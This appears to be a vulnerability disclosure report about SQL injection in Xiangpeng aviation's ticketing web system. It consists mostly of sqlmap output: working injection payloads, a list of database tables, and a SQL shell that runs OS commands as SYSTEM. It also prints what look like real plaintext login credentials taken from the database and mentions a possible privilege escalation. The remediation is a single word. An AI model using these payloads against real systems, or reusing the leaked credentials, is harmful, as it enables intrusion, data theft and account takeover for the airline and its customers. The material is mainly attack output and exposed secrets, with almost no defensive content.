Xiangpeng aviation's system SQL injection (you can run the SQL-shell command)
Xiangpeng aviation's system SQL Injection
Http: // **. **/web/Help. aspx? Code = Private injection parameter: code
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: code Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: code=Private' AND 8659=8659 AND 'vmjH'='vmjH Type: UNION query Title: MySQL UNION query (NULL) - 13 columns Payload: code=-2518' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162717371,0x5452704744716a5a6b64,0x7165796471),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: code=Private'; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: code=Private' AND SLEEP(5) AND 'oGRy'='oGRy---[15:52:34] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5[15:52:34] [INFO] testing if current user is DBA[15:52:34] [INFO] fetching current usercurrent user is DBA: True
Database: ticketdb+----------------------------------------------------+---------+| Table | Entries |+----------------------------------------------------+---------+| npc_sys_action_log | 8062 || shop_commodity_price | 2556 || shop_order_item | 2048 || shop_address | 1477 || shop_order | 1210 || npc_sys_action_detail | 978 || shop_commodity | 874 || shop_commodity_detail | 603 || npc_sys_authorization | 320 || shop_packages | 305 || npc_sys_member_data | 189 || npc_sys_member_info | 175 || shop_cart | 144 || npc_dict_item | 102 || npc_sys_menu | 35 || npc_sys_user_data | 23 || npc_sys_user_info | 22 || npc_sys_config | 11 || npc_dict_group | 10 || npc_info_group | 8 || npc_sys_link_user_role | 8 || npc_info_content_page | 7 || shop_category | 5 || npc_sys_role_info | 3 || info_adv | 2 |+----------------------------------------------------+---------+Database: performance_schema+----------------------------------------------------+---------+| Table | Entries |+----------------------------------------------------+---------+| events_waits_summary_by_thread_by_event_name | 5520 || events_statements_summary_by_thread_by_event_name | 3300 || events_stages_summary_by_thread_by_event_name | 2160 || events_statements_summary_by_digest | 1311 || events_waits_summary_by_account_by_event_name | 552 || events_waits_summary_by_host_by_event_name | 552 || events_waits_summary_by_user_by_event_name | 552 || setup_instruments | 552 || events_statements_summary_by_account_by_event_name | 330 || events_statements_summary_by_host_by_event_name | 330 || events_statements_summary_by_user_by_event_name | 330 || events_waits_summary_global_by_event_name | 276 || events_stages_summary_by_account_by_event_name | 216 || events_stages_summary_by_host_by_event_name | 216 || events_stages_summary_by_user_by_event_name | 216 || table_io_waits_summary_by_index_usage | 185 || events_waits_summary_by_instance | 180 || file_instances | 180 || events_statements_summary_global_by_event_name | 165 || file_summary_by_instance | 151 || objects_summary_global_by_type | 124 || table_io_waits_summary_by_table | 124 || table_lock_waits_summary_by_table | 124 || events_stages_summary_global_by_event_name | 108 || file_summary_by_event_name | 42 || threads | 20 || setup_consumers | 12 || session_account_connect_attrs | 8 || session_connect_attrs | 8 || performance_timers | 5 || setup_objects | 4 || setup_timers | 4 || socket_summary_by_event_name | 3 || accounts | 2 || hosts | 2 || users | 2 || events_statements_current | 1 || setup_actors | 1 |+----------------------------------------------------+---------+
Management User and common user passwords are in plain text
Log on to two of them
18687818813/pm110110
The online game account contains many orders: xyw123/xyw36369
This system can carry out UDF Elevation of Privilege, because 3389 is not open and does not continue;
web server operating system: Windows 2003 or XPweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5[16:40:07] [INFO] testing if current user is DBA[16:40:07] [INFO] fetching current usercurrent user is DBA: True[16:40:07] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTERsql-shell> sys_eval('whoami')[16:40:10] [INFO] fetching SQL query output: 'sys_eval('whoami')'sys_eval('whoami'): 'nt authority\\system'sql-shell> sys_eval('ipconfig')[16:40:13] [INFO] fetching SQL query output: 'sys_eval('ipconfig')'[16:40:13] [WARNING] possible server trimmed output detected (probably due to its length and/or content): \r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter \r\n\t[16:40:13] [INFO] retrieving the length of query output[16:40:13] [INFO] retrieved: 355[16:40:28] [INFO] resuming partial value: \r\nWi[16:41:20] [INFO] retrieved: .. Ethernet adapter \?b1\?be______.. 49/351 (1[16:41:20] [INFO] retrieved: .. Ethernet adapter \?b1\?be______:.. 50/351 (1[16:41:24] [INFO] retrieved: .. Ethernet adapter \?b1\?be__\?c1___:.. 51/351[16:41:24] [INFO] retrieved: .. Ethernet adapter \?b1\?be_\?d8\?c1___:.. 52/[16:41:24] [INFO] retrieved: .. Ethernet adapter \?b1\?be_\?d8\?c1___: .. 53/[16:41:25] [INFO] retrieved: .. Ethernet adapter \?b1\?be_\?d8\?c1___: .. 54/[16:41:26] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1___: .. [16:41:26] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1__\?d3: [16:41:27] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1_\?bd\?d3[16:41:28] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1_\?bd\?d3:[16:41:28] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1_\?bd\?d3: [16:41:30] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d[16:41:30] [INFO] retrieved: ..Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3[16:41:31] [INFO] retrieved: ..hernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: [16:41:32] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: [16:41:33] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: [16:41:33] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: [16:41:33] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: [16:41:33] [INFO] retrieved: ..et adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: [16:41:34] [INFO] retrieved: ..t adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: [16:41:34] [INFO] retrieved: .. adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: [16:41:36] [INFO] retrieved: ..adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: C[16:41:37] [INFO] retrieved: ..dapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Co[16:41:38] [INFO] retrieved: ..apter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Con[16:41:40] [INFO] retrieved: ..ter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Conne[16:41:40] [INFO] retrieved: ..ter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Conne[16:41:40] [INFO] retrieved: ..r \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Connect[16:41:41] [INFO] retrieved: ..\?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Connectio[16:41:41] [INFO] retrieved: ..\?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Connectio[16:41:41] [INFO] retrieved: ..\?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Connectio[16:41:42] [INFO] retrieved: ..b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Connection-[16:41:44] [INFO] retrieved: ..b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Connection-[16:41:44] [INFO] retrieved: ..b5\?d8\?c1\?ac\?bd\?d3: Connection-specific[16:41:45] [INFO] retrieved: ..b5\?d8\?c1\?ac\?bd\?d3: Connection-specific[16:41:46] [INFO] retrieved: ..c1\?ac\?bd\?d3: Connection-specific D.. 83/[16:41:47] [INFO] retrieved: ..bd\?d3: Connection-specific D_S.. 84/351 (2[16:41:47] [INFO] retrieved: ..bd\?d3: Connection-specific D_S.. 85/351 (2[16:43:52] [INFO] retrieved: ..54 Ethernet adapter _\?be______.. 281/351 (80%[16:43:53] [INFO] retrieved: ..4 Ethernet adapter _\?be______ .. 282/351 (80%[16:43:53] [INFO] retrieved: .. Ethernet adapter _\?be______ 2.. 283/351 (81%[16:43:53] [INFO] retrieved: .. Ethernet adapter _\?be\?b5_____ 2.. 284/351 ([16:43:53] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5_____ 2.. 285/35[16:43:55] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5___\?bd_ 2.. 286[16:43:55] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8__\?bd_ 2.. [16:43:56] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8_\?ac\?bd_ 2[16:43:56] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd[16:43:58] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd[16:43:59] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\[16:44:00] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?[16:44:00] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d[16:44:00] [INFO] retrieved: ..Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3[16:44:01] [INFO] retrieved: ..ernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:[16:44:01] [INFO] retrieved: ..ernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:[16:44:01] [INFO] retrieved: ..ernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:[16:44:01] [INFO] retrieved: ..rnet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: [16:44:01] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: [16:44:02] [INFO] retrieved: ..et adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: [16:44:04] [INFO] retrieved: ..t adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: [16:44:05] [INFO] retrieved: .. adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: [16:44:05] [INFO] retrieved: ..adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: [16:44:05] [INFO] retrieved: ..dapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: [16:44:05] [INFO] retrieved: ..apter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: M[16:44:06] [INFO] retrieved: ..pter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: Me[16:44:06] [INFO] retrieved: ..r \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: Media[16:44:06] [INFO] retrieved: ..r \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: Media[16:44:06] [INFO] retrieved: ..r \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: Media[16:44:07] [INFO] retrieved: .. \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: Media [16:44:09] [INFO] retrieved: ..\?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: Media S[16:44:09] [INFO] retrieved: ..b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: Media Sta[16:44:09] [INFO] retrieved: ..b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: Media Sta[16:44:09] [INFO] retrieved: ..be\?b5\?d8\?c1\?ac\?bd\?d3 2: Media State .[16:44:09] [INFO] retrieved: ..b5\?d8\?c1\?ac\?bd\?d3 2: Media State . . .[16:44:10] [INFO] retrieved: ..c1\?ac\?bd\?d3 2: Media State . . . ... 316[16:44:11] [INFO] retrieved: ..c1\?ac\?bd\?d3 2: Media State . . . ... 317[16:44:11] [INFO] retrieved: ..ac\?bd\?d3 2: Media State . . . . .. 318/35[16:44:12] [INFO] retrieved: ..bd\?d3 2: Media State . . . . ... 319/351 ([16:44:13] [INFO] retrieved: ..d3 2: Media State . . . . . .. 320/351 (91%[16:44:28] [INFO] retrieved: Windows IP Configuration Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : **.**.**.** Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: Media State . . . . . . . . . . . : Media disconnected sys_eval('ipconfig'): '\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter \\?b1\\?be\\?b5\\?d8\\?c1\\?ac\\?bd\\?d3:\r\n\r\n Connection-specific DNS Suffix . : \r\n IP Address. . . . . . . . . . . . : **.**.**.**\r\n Subnet Mask . . . . . . . . . . . : **.**.**.**\r\n Default Gateway . . . . . . . . . : **.**.**.**\r\n\r\nEthernet adapter \\?b1\\?be\\?b5\\?d8\\?c1\\?ac\\?bd\\?d3 2:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r'
Solution:
Filter.